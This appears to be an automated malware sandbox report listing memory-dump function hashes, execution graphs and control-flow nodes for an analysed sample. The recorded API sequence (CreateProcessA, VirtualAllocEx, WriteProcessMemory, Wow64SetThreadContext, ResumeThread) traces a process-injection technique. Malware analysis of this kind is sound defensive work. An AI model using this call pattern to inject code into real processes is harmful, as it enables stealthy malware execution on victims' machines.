                                            • Opcode Fuzzy Hash: c3e8fd24e35144c6c51b79a4776aab2c0254fbd332ed16bca9bd79161999ca99
                                            • Instruction Fuzzy Hash: 16F030B9E002159FC740DFB8A5066AE7BF9BE88225B15406BE509E3610EA344A179BD0
                                            Function 07495B6F Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3837528791.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7490000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9415ac02b765c5e98025e49a43459b506ff8cdbe67ab6aab685d98227732abc3
                                            • Instruction ID: acdee30258acc2829c747886d200b3ded7bee79c0ff589bb10789ec041f4093d
                                            • Opcode Fuzzy Hash: 9415ac02b765c5e98025e49a43459b506ff8cdbe67ab6aab685d98227732abc3
                                            • Instruction Fuzzy Hash: 8DE0E572A402408FC700CFA4C202AC9BFF0EB06260F3080AAC062CB2A2CA7442028F80
                                            Function 01668C11 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b772b322e07be6bd968e59a6fe79cd7ce027100c05ed1655acddeb306f275ce
                                            • Instruction ID: f4f9f52bd014214e972a11f4a44a2dc60478c58c87b2f4a5e1a37ed696a8be0a
                                            • Opcode Fuzzy Hash: 0b772b322e07be6bd968e59a6fe79cd7ce027100c05ed1655acddeb306f275ce
                                            • Instruction Fuzzy Hash: 20E03975F101188FCB11EBB9E8485DDB7F9EF9C221B004026E80AE3310EE389C028B22
                                            Function 01667F18 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3816455426.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_1660000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2d6e71f5e2f1d9b5332eef4182bae683c2d67fd965833187593ce36bca82ef01
                                            • Instruction ID: 340f453bb1e089c24bb344fe4a3666e87130328797d2b8b8dc084002a337fd15
                                            • Opcode Fuzzy Hash: 2d6e71f5e2f1d9b5332eef4182bae683c2d67fd965833187593ce36bca82ef01
                                            • Instruction Fuzzy Hash: BAE01275E001199F47509BBDA8055AE7AFDFA88261B040076E509D3200EA7049018BD1
                                            Function 07495C68 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3837528791.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7490000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c13f3919964c9f2ee7bea4ce314d7aa630c55eb0c9dab9cd7db267d8c0912cce
                                            • Instruction ID: 310909e651d6788c1de232bfd565538c257f3ef62c3db9f824044e2f724b81af
                                            • Opcode Fuzzy Hash: c13f3919964c9f2ee7bea4ce314d7aa630c55eb0c9dab9cd7db267d8c0912cce
                                            • Instruction Fuzzy Hash: 16E0867300C2809E9B12DBA5E884E527FE9AF262503188067E098C7961D215E024DB22
                                            Function 074915D8 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3837528791.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7490000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 48d1ba0ad9f71e65f91079cb8d7099da5ed8ad276619cc92332acdf2b68acb62
                                            • Instruction ID: ea20cd2e1c70477a9ffadc5f9e65290b94f85710e9a186c8847370b9ffeb9e1a
                                            • Opcode Fuzzy Hash: 48d1ba0ad9f71e65f91079cb8d7099da5ed8ad276619cc92332acdf2b68acb62
                                            • Instruction Fuzzy Hash: 10E04671A0220AFFCB00EFAAE90985CBBBAEB44610B1085ADE80493740DA366E00DB55
                                            Function 07495B80 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3837528791.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7490000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0f467dfc182fec736e4b8b2ac4d2f553aa10ab259eb8c3db5dcd7212f6ad25c
                                            • Instruction ID: 33334b44073479d3cc2a316380a6fb8dca8cc10cc235d325e66474cea1109e95
                                            • Opcode Fuzzy Hash: a0f467dfc182fec736e4b8b2ac4d2f553aa10ab259eb8c3db5dcd7212f6ad25c
                                            • Instruction Fuzzy Hash: 9CE09AB0D40209DFDB40DF69C505A9EBFF1AB08200F2185A6D415E7251E7B496058F91
                                            Function 074937A9 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3837528791.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7490000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1d6277b137a8188a10ede04675a50ca8a08bbc315f72423315970a7733101b9
                                            • Instruction ID: 701df608575ed807603f63030b1f2a407eec86595bd06eb707c5bef80108a329
                                            • Opcode Fuzzy Hash: a1d6277b137a8188a10ede04675a50ca8a08bbc315f72423315970a7733101b9
                                            • Instruction Fuzzy Hash: 41D09E710097908FCF169F5464452953FA0AF5232973503DBD5958A1D3C626CA4BC7E1
                                            Function 07493940 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3837528791.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7490000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d654f53471d2a66cc090b0df6e5cbf528c5aad1ac4ed3cd1b8ff1ae138e2ab5
                                            • Instruction ID: 13bdef29e0a154eb47c34816a13c701baeed3d1808665a617598f641dd55b646
                                            • Opcode Fuzzy Hash: 5d654f53471d2a66cc090b0df6e5cbf528c5aad1ac4ed3cd1b8ff1ae138e2ab5
                                            • Instruction Fuzzy Hash: FCC08CE23093A82E8A03712128001E23F12C8D316230982B3838AC61AAC408894702D2
                                            Function 07492E98 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3837528791.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7490000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2efc59f20bac120845dad0273fa699fcf70e59551ef400d8b738364f6b05d699
                                            • Instruction ID: 9f5140310b8f622548a1052a0727f3a4143412c7ea18af4bf88b1146b504cb51
                                            • Opcode Fuzzy Hash: 2efc59f20bac120845dad0273fa699fcf70e59551ef400d8b738364f6b05d699
                                            • Instruction Fuzzy Hash: 31C012F0000200AFCF04DF1481481943BA0FB43328B704ACAD0154A1C1C772C54BCBC1

                                            Execution Graph

                                            Execution Coverage:9.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:116
                                            Total number of Limit Nodes:12
                                            execution_graph 38903 779c558 38904 779c5a0 WriteProcessMemory 38903->38904 38906 779c5f7 38904->38906 38936 779c648 38937 779c693 ReadProcessMemory 38936->38937 38939 779c6d7 38937->38939 39023 779d018 39024 779d0a1 CreateProcessA 39023->39024 39026 779d263 39024->39026 39027 779c498 39028 779c4d8 VirtualAllocEx 39027->39028 39030 779c515 39028->39030 38944 31cd158 38945 31cd15d 38944->38945 38949 31cd338 38945->38949 38953 31cd328 38945->38953 38946 31cd28b 38950 31cd33d 38949->38950 38957 31cca40 38950->38957 38954 31cd338 38953->38954 38955 31cca40 DuplicateHandle 38954->38955 38956 31cd366 38955->38956 38956->38946 38958 31cd3a0 DuplicateHandle 38957->38958 38960 31cd366 38958->38960 38960->38946 38961 31cadd8 38962 31cadd9 38961->38962 38966 31caebf 38962->38966 38976 31caed0 38962->38976 38963 31cade7 38967 31caec4 38966->38967 38970 31caf04 38967->38970 38986 31c98d8 38967->38986 38970->38963 38971 31cb108 GetModuleHandleW 38973 31cb135 38971->38973 38972 31caefc 38972->38970 38972->38971 38973->38963 38977 31caed1 38976->38977 38978 31c98d8 GetModuleHandleW 38977->38978 38980 31caf04 38977->38980 38979 31caeec 38978->38979 38979->38980 38984 31cb168 GetModuleHandleW 38979->38984 38985 31cb159 2 API calls 38979->38985 38980->38963 38981 31cb108 GetModuleHandleW 38983 31cb135 38981->38983 38982 31caefc 38982->38980 38982->38981 38983->38963 38984->38982 38985->38982 38987 31cb0c0 GetModuleHandleW 38986->38987 38989 31caeec 38987->38989 38989->38970 38990 31cb159 38989->38990 38997 31cb168 38989->38997 38991 31cb102 GetModuleHandleW 38990->38991 38992 31cb162 38990->38992 38995 31cb135 38991->38995 38994 31c98d8 GetModuleHandleW 38992->38994 38996 31cb17c 38994->38996 38995->38972 38996->38972 38998 31cb169 38997->38998 38999 31c98d8 GetModuleHandleW 38998->38999 39000 31cb17c 38999->39000 39000->38972 39035 31c4668 39036 31c4669 39035->39036 39037 31c4672 39036->39037 39039 31c4758 39036->39039 39040 31c475d 39039->39040 39044 31c4858 39040->39044 39048 31c4868 39040->39048 39046 31c485c 39044->39046 39045 31c496c 39045->39045 39046->39045 39052 31c449c 39046->39052 39049 31c4869 39048->39049 39050 31c449c CreateActCtxA 39049->39050 39051 31c496c 39049->39051 39050->39051 39053 31c58f8 CreateActCtxA 39052->39053 39055 31c59bb 39053->39055 38940 779c3c0 38941 779c405 Wow64SetThreadContext 38940->38941 38943 779c44d 38941->38943 39031 779c310 39032 779c350 ResumeThread 39031->39032 39034 779c381 39032->39034 38907 76b2640 38908 76b267a 38907->38908 38909 76b270b 38908->38909 38910 76b26f6 38908->38910 38912 76b03c8 3 API calls 38909->38912 38915 76b03c8 38910->38915 38914 76b271a 38912->38914 38917 76b03d3 38915->38917 38916 76b2701 38917->38916 38920 76b3100 38917->38920 38926 76b30f0 38917->38926 38933 76b041c 38920->38933 38923 76b3127 38923->38916 38924 76b3150 CreateIconFromResourceEx 38925 76b31ce 38924->38925 38925->38916 38927 76b3100 38926->38927 38928 76b041c CreateIconFromResourceEx 38927->38928 38929 76b311a 38928->38929 38930 76b3127 38929->38930 38931 76b3150 CreateIconFromResourceEx 38929->38931 38930->38916 38932 76b31ce 38931->38932 38932->38916 38934 76b3150 CreateIconFromResourceEx 38933->38934 38935 76b311a 38934->38935 38935->38923 38935->38924 39001 76b6da0 39003 76b6dc1 39001->39003 39002 76b6dd6 39003->39002 39006 76b4b5c 39003->39006 39005 76b6e41 39007 76b4b67 39006->39007 39008 76b8349 39007->39008 39012 76b8e08 39007->39012 39016 76b8e18 39007->39016 39008->39005 39009 76b845c 39009->39005 39013 76b8e18 39012->39013 39019 76b790c 39013->39019 39017 76b790c DrawTextExW 39016->39017 39018 76b8e35 39017->39018 39018->39009 39021 76b8e50 DrawTextExW 39019->39021 39022 76b8e35 39021->39022 39022->39009

                                            Executed Functions

                                            Function 0C040E98 Relevance: .3, Instructions: 332COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1463253712.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_c040000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9112a4ee4e58d52b938c2db8991eed2c515bc295943782cfb9b7a308261e9c8c
                                            • Instruction ID: 0c90dc04a3d40f6fb92b9f8c5b4ea42c32f087979dcdc507392370f8ec0049bb
                                            • Opcode Fuzzy Hash: 9112a4ee4e58d52b938c2db8991eed2c515bc295943782cfb9b7a308261e9c8c
                                            • Instruction Fuzzy Hash: 54C197B17017488FDB2ADB75C464BAFB7F6AF89600F24846DD14ADB290CB35E841CB61
                                            Function 0779D018 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 779d018-779d0ad 2 779d0af-779d0b9 0->2 3 779d0e6-779d106 0->3 2->3 4 779d0bb-779d0bd 2->4 10 779d108-779d112 3->10 11 779d13f-779d16e 3->11 5 779d0bf-779d0c9 4->5 6 779d0e0-779d0e3 4->6 8 779d0cb 5->8 9 779d0cd-779d0dc 5->9 6->3 8->9 9->9 12 779d0de 9->12 10->11 13 779d114-779d116 10->13 17 779d170-779d17a 11->17 18 779d1a7-779d261 CreateProcessA 11->18 12->6 15 779d139-779d13c 13->15 16 779d118-779d122 13->16 15->11 19 779d124 16->19 20 779d126-779d135 16->20 17->18 21 779d17c-779d17e 17->21 31 779d26a-779d2f0 18->31 32 779d263-779d269 18->32 19->20 20->20 22 779d137 20->22 23 779d1a1-779d1a4 21->23 24 779d180-779d18a 21->24 22->15 23->18 26 779d18c 24->26 27 779d18e-779d19d 24->27 26->27 27->27 28 779d19f 27->28 28->23 42 779d300-779d304 31->42 43 779d2f2-779d2f6 31->43 32->31 45 779d314-779d318 42->45 46 779d306-779d30a 42->46 43->42 44 779d2f8 43->44 44->42 48 779d328-779d32c 45->48 49 779d31a-779d31e 45->49 46->45 47 779d30c 46->47 47->45 50 779d33e-779d345 48->50 51 779d32e-779d334 48->51 49->48 52 779d320 49->52 53 779d35c 50->53 54 779d347-779d356 50->54 51->50 52->48 54->53
                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0779D24E
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1462201225.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7790000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: d45191463cee00ab4821f549307091a7f5b1e275ef8dff8d90328e49d787c16f
                                            • Instruction ID: 50fa517ad4041048111c76e541f42a0cf02bcf8171c9c9589c3207e0ca8a36fe
                                            • Opcode Fuzzy Hash: d45191463cee00ab4821f549307091a7f5b1e275ef8dff8d90328e49d787c16f
                                            • Instruction Fuzzy Hash: F89149B1E01319DFEF24CF68D840BEEBBB2BB48350F158569D809A7240DB759985CF91
                                            Function 031CAED0 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 56 31caed0-31caedf 59 31caf0b-31caf0f 56->59 60 31caee1-31caeee call 31c98d8 56->60 62 31caf11-31caf1b 59->62 63 31caf23-31caf64 59->63 67 31caf04 60->67 68 31caef0 60->68 62->63 69 31caf66-31caf6e 63->69 70 31caf71-31caf7f 63->70 67->59 115 31caef6 call 31cb168 68->115 116 31caef6 call 31cb159 68->116 69->70 71 31caf81-31caf86 70->71 72 31cafa3-31cafa5 70->72 75 31caf88-31caf8f call 31ca8b4 71->75 76 31caf91 71->76 74 31cafa8-31cafaf 72->74 73 31caefc-31caefe 73->67 77 31cb040-31cb0be 73->77 79 31cafbc-31cafc3 74->79 80 31cafb1-31cafb9 74->80 81 31caf93-31cafa1 75->81 76->81 108 31cb0c5-31cb100 77->108 109 31cb0c0-31cb0c4 77->109 82 31cafc5-31cafcd 79->82 83 31cafd0-31cafd9 call 31ca8c4 79->83 80->79 81->74 82->83 89 31cafdb-31cafe3 83->89 90 31cafe6-31cafeb 83->90 89->90 91 31cafed-31caff4 90->91 92 31cb009-31cb016 90->92 91->92 94 31caff6-31cb006 call 31ca8d4 call 31ca8e4 91->94 99 31cb018-31cb036 92->99 100 31cb039-31cb03f 92->100 94->92 99->100 110 31cb108-31cb133 GetModuleHandleW 108->110 111 31cb102-31cb105 108->111 109->108 112 31cb13c-31cb150 110->112 113 31cb135-31cb13b 110->113 111->110 113->112 115->73 116->73
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1451904412.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_31c0000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 3bbc41d97cdb8066008427c8eff362a5c100cabd44fd5201330a216150918ffd
                                            • Instruction ID: dea424e797a03d67948bec8647a7d85195fbf1b703641b07ea342326f6c3871b
                                            • Opcode Fuzzy Hash: 3bbc41d97cdb8066008427c8eff362a5c100cabd44fd5201330a216150918ffd
                                            • Instruction Fuzzy Hash: 207167B0A10B498FDB25CF29D05579ABBF1FF88310F04892DD09ADBA40DB75E845CB91
                                            Function 031C449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 117 31c449c-31c59b9 CreateActCtxA 120 31c59bb-31c59c1 117->120 121 31c59c2-31c5a1c 117->121 120->121 128 31c5a1e-31c5a21 121->128 129 31c5a2b-31c5a2f 121->129 128->129 130 31c5a40 129->130 131 31c5a31-31c5a3d 129->131 133 31c5a41 130->133 131->130 133->133
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 031C59A9
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1451904412.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_31c0000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 41a5c16d11f6a57d75bb244128052463c67a9394acd716cce8517b6301374437
                                            • Instruction ID: 9468668248eee9bac5387c764c24afc55b11e72006911a7b9afaa75f1b228030
                                            • Opcode Fuzzy Hash: 41a5c16d11f6a57d75bb244128052463c67a9394acd716cce8517b6301374437
                                            • Instruction Fuzzy Hash: C541D270C1075DCBDB24DFAAC8847DEBBB6BF59304F24806AD408AB251DB756945CFA0
                                            Function 031C58ED Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 134 31c58ed-31c58ee 135 31c58f5 134->135 136 31c58f0 134->136 137 31c58fc-31c59b9 CreateActCtxA 135->137 136->135 139 31c59bb-31c59c1 137->139 140 31c59c2-31c5a1c 137->140 139->140 147 31c5a1e-31c5a21 140->147 148 31c5a2b-31c5a2f 140->148 147->148 149 31c5a40 148->149 150 31c5a31-31c5a3d 148->150 152 31c5a41 149->152 150->149 152->152
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 031C59A9
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1451904412.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_31c0000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: a533c398fe1ba9bdffb326d820e1938495299ad0fd579e953ec55ca66fa34d35
                                            • Instruction ID: de941235147df60f58a6408c4a980edc98cbf884ee1af6c47efd720a8f8a26a2
                                            • Opcode Fuzzy Hash: a533c398fe1ba9bdffb326d820e1938495299ad0fd579e953ec55ca66fa34d35
                                            • Instruction Fuzzy Hash: 9841E4B0C10769CFDB24DFAAC8847DDBBB6BF49304F24806AD418AB251DB756945CF60
                                            Function 076B3100 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 220 76b3100-76b3125 call 76b041c 223 76b313a-76b31cc CreateIconFromResourceEx 220->223 224 76b3127-76b3137 220->224 228 76b31ce-76b31d4 223->228 229 76b31d5-76b31f2 223->229 228->229
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1462075146.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_76b0000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: CreateFromIconResource
                                            • String ID:
                                            • API String ID: 3668623891-0
                                            • Opcode ID: d90d01af666766c0273c2f0c994ac377a725a7cfdabab296c25f3bad60546e71
                                            • Instruction ID: de782ae9c3dcc88d3d9cc54cf57a6442d3d7e821d5d7f16d6587bec17a430ce3
                                            • Opcode Fuzzy Hash: d90d01af666766c0273c2f0c994ac377a725a7cfdabab296c25f3bad60546e71
                                            • Instruction Fuzzy Hash: CA318F719043999FCB12CFA9C844ADEBFF8EF49310F14806AE555A7251C3359851CFA5
                                            Function 076B790C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 232 76b790c-76b8e9c 234 76b8e9e-76b8ea4 232->234 235 76b8ea7-76b8eb6 232->235 234->235 236 76b8ebb-76b8ef4 DrawTextExW 235->236 237 76b8eb8 235->237 238 76b8efd-76b8f1a 236->238 239 76b8ef6-76b8efc 236->239 237->236 239->238
                                            APIs
                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,076B8E35,?,?), ref: 076B8EE7
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1462075146.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_76b0000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: DrawText
                                            • String ID:
                                            • API String ID: 2175133113-0
                                            • Opcode ID: e7b3462b1eee2c5a974c32271a488fc98a0610c64dab9da67341622da85a89d3
                                            • Instruction ID: ee2d75a79037a497ad0759d792884550972a5f10955ada0ebbdf316ccf782fbf
                                            • Opcode Fuzzy Hash: e7b3462b1eee2c5a974c32271a488fc98a0610c64dab9da67341622da85a89d3
                                            • Instruction Fuzzy Hash: AE31E4B590034A9FDB10CF9AD884ADEBBF9FB48310F54842AE515A7310D775A941CFA4
                                            Function 0779C558 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 242 779c558-779c5a6 244 779c5a8-779c5b4 242->244 245 779c5b6-779c5f5 WriteProcessMemory 242->245 244->245 247 779c5fe-779c62e 245->247 248 779c5f7-779c5fd 245->248 248->247
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0779C5E8
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1462201225.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_7790000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 98d3221e994d9290954e04bf7d332cedc33fcca0e491ed7bf79f2fb7e45b4145
                                            • Instruction ID: 75d1be6a4838315e8cee932ef803ebfbf0b367669cc517128a378e30e049086c
                                            • Opcode Fuzzy Hash: 98d3221e994d9290954e04bf7d332cedc33fcca0e491ed7bf79f2fb7e45b4145
                                            • Instruction Fuzzy Hash: 082139B19003499FDF10CFAAC885BEEBBF5FF48310F10842AE919A7240D7789940CBA4
                                            Function 076B8E4F Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 252 76b8e4f-76b8e9c 253 76b8e9e-76b8ea4 252->253 254 76b8ea7-76b8eb6 252->254 253->254 255 76b8ebb-76b8ef4 DrawTextExW 254->255 256 76b8eb8 254->256 257 76b8efd-76b8f1a 255->257 258 76b8ef6-76b8efc 255->258 256->255 258->257
                                            APIs
                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,076B8E35,?,?), ref: 076B8EE7
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1462075146.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_76b0000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: DrawText
                                            • String ID:
                                            • API String ID: 2175133113-0
                                            • Opcode ID: 9d5077d47e7153803a25d0e84d43594e76c11c84def360f38d6ce5710b32bab7
                                            • Instruction ID: b77094ea392dfc0acf84b4c4ba26e5d98dd074b5888af7cb6b5823f6cce9404e
                                            • Opcode Fuzzy Hash: 9d5077d47e7153803a25d0e84d43594e76c11c84def360f38d6ce5710b32bab7
                                            • Instruction Fuzzy Hash: 2521E0B5D0034A9FDB10CFAAD880AEEBBF4BF48320F14842AE419A7310C374A541CFA4
                                            Function 031CCA40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 261 31cca40-31cd434 DuplicateHandle 264 31cd43d-31cd45a 261->264 265 31cd436-31cd43c 261->265 265->264
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031CD366,?,?,?,?,?), ref: 031CD427
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1451904412.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_31c0000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: c1307dcabcfd938f03757e7a2acfde284ee5f64775ccab5141461693729cdca8
                                            • Instruction ID: 0177c13ce91ac28733c3b859f552e89f0764031d328920152381108ac7353739
                                            • Opcode Fuzzy Hash: c1307dcabcfd938f03757e7a2acfde284ee5f64775ccab5141461693729cdca8
                                            • Instruction Fuzzy Hash: 2D21E5B59102489FDB10CF9AD884AEEFBF4FB48310F14842AE918A7350D374A950CFA5
                                            Function 031CD398 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 268 31cd398-31cd39e 269 31cd3a5-31cd434 DuplicateHandle 268->269 270 31cd3a0-31cd3a4 268->270 271 31cd43d-31cd45a 269->271 272 31cd436-31cd43c 269->272 270->269 272->271
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031CD366,?,?,?,?,?), ref: 031CD427
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1451904412.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_31c0000_NnXVkDOvj.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 8978fa5f03e5dfd259bc45b9591eafc865c72a93d23a57aea70323ca77bc5569
                                            • Instruction ID: 07cfb496d88ccd776e8ede9dbe0ece50448a59d14439281b6caaf35d7a237ba1
                                            • Opcode Fuzzy Hash: 8978fa5f03e5dfd259bc45b9591eafc865c72a93d23a57aea70323ca77bc5569
                                            • Instruction Fuzzy Hash: 7921D4B5D102499FDB10CF9AE885ADEFBF4FB48210F14802AE918A7250D375A940CF65
                                            Function 0779C648 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 285 779c648-779c6d5 ReadProcessMemory 288 779c6de-779c70e 285->288 289 779c6d7-779c6dd 285->289 289->288
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0779C6C8
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.1462201225.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                            Joe Sandbox IDA Plugin
